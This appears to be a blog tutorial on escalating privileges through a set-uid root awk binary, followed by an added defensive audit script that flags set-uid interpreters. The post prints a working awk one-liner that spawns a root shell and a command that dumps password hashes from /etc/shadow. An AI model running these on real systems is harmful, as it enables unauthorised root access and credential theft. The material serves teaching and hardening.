Monday, September 2, 2019

Suid binary exploitation

Suid binary exploitation involves a binary with its SUID bit set, so that anything executed by the program runs with the privileges of the user that owns the file. First we search the filesystem, starting at the root, for SUID binaries owned by root.


sam@asus:~% find / -user root -perm -4000 -exec ls -ldb {} \;
-r-sr-xr-x 1 root bin 38836 Aug 10 16:16 /usr/bin/at
-rwsr-xr-x 1 root root 11288 Nov 19 11:29 /usr/bin/awk
-r-sr-xr-x 1 root bin 19812 Aug 10 16:16 /usr/bin/crontab
---s--x--x 1 root sys 46040 Aug 10 15:18 /usr/bin/ct
-r-sr-xr-x 1 root sys 12092 Aug 11 01:29 /usr/lib/mv_dir
-r-sr-sr-x 1 root bin 33208 Aug 10 15:55 /usr/lib/lpadmin
-r-sr-sr-x 1 root bin 38696 Aug 10 15:55 /usr/lib/lpsched
---s--x--- 1 root rar 45376 Aug 18 15:11 /usr/rar/bin/sh
-r-sr-xr-x 1 root bin 12524 Aug 11 01:27 /usr/bin/df
-rwsr-xr-x 1 root sys 21780 Aug 11 01:27 /usr/bin/newgrp
-r-sr-sr-x 1 root sys 23000 Aug 11 01:27 /usr/bin/passwd
-r-sr-xr-x 1 root sys 23824 Aug 11 01:27 /usr/bin/su
...
sam@asus:~%

We can see that the AWK program has `-rwsr` instead of `-rwxr`, signifying that the SUID bit is set on it. We also see that it is owned by root:root, meaning any instruction we pass to AWK will be run with root privileges.


sam@asus:~% ls -la /usr/bin/awk
-rwsr-xr-x 1 root root 1911288 Nov 19 11:29 /usr/bin/awk
sam@asus:~% 

Next we can use the AWK program to try to spawn a simple shell with the awk system() function call.

sam@asus:~% id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),27(sudo),46(plugdev),112(lpadmin)
sam@asus:~%

Let's issue our shell command and check our uid/gid stats afterward.

sam@asus:~% awk 'BEGIN{system("/bin/sh")}'
# id
uid=1000(sam) gid=1000(sam) euid=0(root) groups=1000(sam),4(adm),24(cdrom),27(sudo),46(plugdev),112(lpadmin)
# 

And of course we raid the /etc/shadow file for password hashes.


# cut -d: -f1,2 /etc/shadow
...
# exit
sam@asus:~% 

Since the AWK binary is owned by root and has its SUID bit set, the shell it spawns runs with `euid=0(root)`, and the AWK program will execute any instructions as root. This is one of many tools you can use to escalate privileges on a UNIX box if the SUID bit is set.
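
A defender's view of the same listing, as an added example that is not part of the original post: the function below reads `ls -l` style lines such as those printed by the find command above and flags set-uid-root files that are interpreters or that fall outside a baseline. The baseline and interpreter lists, the function names and the last sample line are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the original post.
# Assumed baseline of binaries expected to be set-uid root on this host.
SUID_BASELINE="at crontab df newgrp passwd su"
# Assumed starter list of programs that run arbitrary commands by design.
SUID_INTERPRETERS="sh bash dash ksh awk gawk mawk nawk perl python ruby"

# Reads ls -l lines on stdin and prints "SEVERITY path" for each finding.
# Paths containing spaces are not handled (the path is taken as the last field).
audit_suid() {
    awk -v base="$SUID_BASELINE" -v interp="$SUID_INTERPRETERS" '
    BEGIN {
        n = split(base, b, " ");   for (i = 1; i <= n; i++) ok[b[i]] = 1
        n = split(interp, p, " "); for (i = 1; i <= n; i++) bad[p[i]] = 1
    }
    # Character 4 of the mode string is the owner-execute slot: "s" or "S"
    # there means the set-uid bit is on. Field 3 is the owning user.
    NF >= 9 && substr($1, 4, 1) ~ /[sS]/ && $3 == "root" {
        path = $NF
        name = path
        sub(/.*\//, "", name)               # keep the basename only
        if (name in bad)        print "CRITICAL " path
        else if (!(name in ok)) print "REVIEW " path
    }'
}

# Sample input: five lines copied from the listing above, plus one
# constructed line (/usr/bin/sed) without the set-uid bit.
sample_listing() {
    cat <<'EOF'
-r-sr-xr-x 1 root bin 38836 Aug 10 16:16 /usr/bin/at
-rwsr-xr-x 1 root root 11288 Nov 19 11:29 /usr/bin/awk
---s--x--x 1 root sys 46040 Aug 10 15:18 /usr/bin/ct
---s--x--- 1 root rar 45376 Aug 18 15:11 /usr/rar/bin/sh
-r-sr-sr-x 1 root sys 23000 Aug 11 01:27 /usr/bin/passwd
-rwxr-xr-x 1 root root 20480 Jan  1 00:00 /usr/bin/sed
EOF
}

sample_listing | audit_suid
```

On a live host, pipe the output of `find / -user root -perm -4000 -exec ls -ldb {} \;` into `audit_suid`; a flagged interpreter is fixed by clearing the bit, for example `chmod u-s /usr/bin/awk`.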
